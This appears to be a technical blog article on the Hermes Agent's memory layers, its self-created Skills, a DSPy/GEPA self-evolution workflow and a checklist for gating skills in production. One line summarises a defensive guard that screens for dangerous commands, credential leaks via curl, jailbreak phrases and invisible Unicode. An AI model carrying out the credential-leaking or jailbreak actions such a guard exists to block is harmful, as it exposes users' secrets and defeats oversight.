Artificial Intelligence 21 min read

How Hermes Agents Self‑Evolve: What Should Remain After a Task?

The article examines Hermes Agent’s three‑layer memory system—facts, session retrieval, and process assets—detailing how Skills are created, stored, patched, and secured at runtime, and argues that reliable self‑evolution requires disciplined versioning, evaluation, and access controls rather than unchecked automatic skill generation.

Architect

Apr 24, 2026

How Hermes Agents Self‑Evolve: What Should Remain After a Task?

Memory layers

Hermes distinguishes three orthogonal layers of persistent information:

Fact Memory – static facts such as user preferences, project conventions, and environment details. Stored as small JSON/YAML files (e.g., MEMORY.md ≈ 2,200 chars, USER.md ≈ 1,375 chars) and injected as a frozen snapshot into the system prompt at session start.

Session Search – historical dialogues, task records, and contextual clues. Persisted in state.db and queried via SQLite FTS5, allowing on‑demand retrieval without polluting the prompt cache.

Process Assets (Skills) – reusable procedures, pitfalls, verification steps, and tool combinations. Represented as .md skill files, runbooks, or checklists that answer “how to do this kind of task in the future”.

Example (deploying a Next.js service):

Fact Memory records the repository URL, default branch, that the team uses pnpm, and that production runs on Vercel.

Session Search can retrieve the previous deployment’s gotchas.

A Skill stores the post‑deployment checklist: verify env vars → run build → smoke‑test → inspect logs.

Hermes runtime handling of process assets

The Hermes README positions the agent as “self‑improving”. Its skill system follows a three‑level progressive‑disclosure model:

Level 0 – skills_list() returns name, description, and category.

Level 1 – skill_view(name) loads the full skill content on demand.

Level 2 – Supporting files are loaded only when deeper detail is required.

Beyond static documentation, Hermes lets the agent automatically create, edit, and delete skills after a complex task succeeds, encounters an error, or receives user correction. The implementation in run_agent.py performs a best‑effort review: the main task finishes first, then a background worker decides whether the experience merits preservation.

Key engineering details:

Atomic disk writes – skill creation writes to a temporary file and replaces the target with os.replace(), guaranteeing that either the old or the new version survives a crash and avoiding TOCTOU races.

Injection as a user message – skill content is added as a user‑role message rather than modifying the system prompt, preserving prompt‑cache stability. A 30‑turn tool‑heavy task can save >95 % token cost by keeping the system prompt unchanged.

Fuzzy‑match patching – patches tolerate whitespace, indentation, and line‑break differences because LLMs rarely reproduce exact formatting.

Eventual consistency – patched skills become visible only in the next session after the index cache and disk snapshot are cleared, mirroring real‑world rollback semantics.

Comparison with other experience‑externalisation approaches

Three related projects address the same problem at different layers:

Claude Skills – turn team experience into modular work units that agents can invoke.

Codex AGENTS.md – embed engineering experience directly in the repository (AGENTS.md, justfile, CI, schema fixtures) so both humans and agents follow the same workflow.

OpenClaw – focuses on entry‑point routing and message dispatch; Hermes focuses on runtime execution and learning.

Risks of automatic skill deposition

Automatically generated skills can solidify erroneous behavior, turning a one‑off mistake into a permanent default action. Hermes mitigates this with a guard system covering >90 threat patterns, including dangerous commands, credential leaks via curl, jailbreak phrases, zero‑width characters, and other invisible Unicode tricks.

Trust levels are differentiated:

Built‑in skills – fully trusted.

Community skills – only the safest operations allowed.

Agent‑created skills – medium risk; dangerous actions require explicit user confirmation.

Self‑evolution repository

The hermes-agent-self-evolution repository (https://github.com/NousResearch/hermes-agent-self-evolution) uses DSPy + GEPA to generate candidate skill variants, tool descriptions, and system prompts. The workflow is:

Read the current skill / prompt / tool.

Generate evaluation data from execution traces.

Combine traces with GEPA to propose variants.

Run an evaluation suite; variants that pass size limits, cache compatibility, and semantic constraints are submitted as a PR to the main hermes-agent repo.

This ensures that every change is tested, versioned, and reviewed before becoming part of the production runtime.

Production gate checklist for skills

To adopt Hermes‑style skills safely, the author recommends implementing the following gates:

Structure – each skill must declare trigger conditions, problem scope, required tools, step list, acceptance criteria, and exclusion cases (enforced via front‑matter, size caps, and directory layout).

Source trust – distinguish built‑in, team, community, and agent‑generated skills with separate installation policies; a single policy is insufficient for production safety.

Evaluation – provide minimal test cases showing typical inputs, expected outputs, and prohibited errors. The self‑evolution repo demonstrates an “evaluate before PR” workflow.

Versioning & rollback – keep diffs, changelogs, and a configurable number of recent versions; current Hermes patches lack robust version history, making recovery costly.

Permissions – explicitly list which tools, directories, network resources, and credentials a skill may access to prevent it from becoming an unchecked permission wrapper.

Takeaways

Agents are moving from a focus on model size, tool integration, and context handling toward an “experience layer” that externalises repeatable processes. Practical steps:

Separate fact memory, session retrieval, and process assets.

Start by codifying high‑frequency, verifiable, and troubleshooting flows as small, well‑defined skills.

Only after these stabilize should self‑evolution be pursued.

References

Hermes Agent GitHub: https://github.com/NousResearch/hermes-agent

Hermes Skills documentation: https://hermes-agent.nousresearch.com/docs/user-guide/features/skills/

Hermes Persistent Memory: https://hermes-agent.nousresearch.com/docs/user-guide/features/memory/

Hermes Skills Hub: https://hermes-agent.nousresearch.com/docs/skills/

Hermes Self‑Evolution repo: https://github.com/NousResearch/hermes-agent-self-evolution

Evolutionary Self‑Improvement issue: https://github.com/NousResearch/hermes-agent/issues/337

Anthropic Agent Skills: https://claude.com/blog/skills

Voyager paper: https://arxiv.org/abs/2305.16291

Reflexion paper: https://arxiv.org/abs/2303.11366

versioning Self‑evolution prompt caching AI Skills Hermes Agent Process Assets

Written by

Architect

Professional architect sharing high‑quality architecture insights. Topics include high‑availability, high‑performance, high‑stability architectures, big data, machine learning, Java, system and distributed architecture, AI, and practical large‑scale architecture case studies. Open to ideas‑driven architects who enjoy sharing and learning.

0 followers

Reader feedback

How this landed with the community

Rate this article

Was this worth your time?

Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.